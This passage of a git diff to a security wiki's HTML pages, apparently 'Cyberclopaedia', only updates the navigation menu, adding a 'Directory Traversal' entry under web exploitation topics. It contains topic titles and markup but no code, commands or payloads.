        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -253,22 +253,6 @@

Col - - diff --git a/docs/Cryptography/Hash Functions/index.html b/docs/Cryptography/Hash Functions/index.html index 0396a355..d58db6a6 100644 --- a/docs/Cryptography/Hash Functions/index.html +++ b/docs/Cryptography/Hash Functions/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -198,22 +198,6 @@

Introduction - - diff --git a/docs/Cryptography/Integrity Verification/Merkle Trees.html b/docs/Cryptography/Integrity Verification/Merkle Trees.html index 771d6bf2..ce8177ee 100644 --- a/docs/Cryptography/Integrity Verification/Merkle Trees.html +++ b/docs/Cryptography/Integrity Verification/Merkle Trees.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -191,22 +191,6 @@

Merkle Trees - - diff --git a/docs/Cryptography/Integrity Verification/index.html b/docs/Cryptography/Integrity Verification/index.html index 84bcabb9..ff2012b4 100644 --- a/docs/Cryptography/Integrity Verification/index.html +++ b/docs/Cryptography/Integrity Verification/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
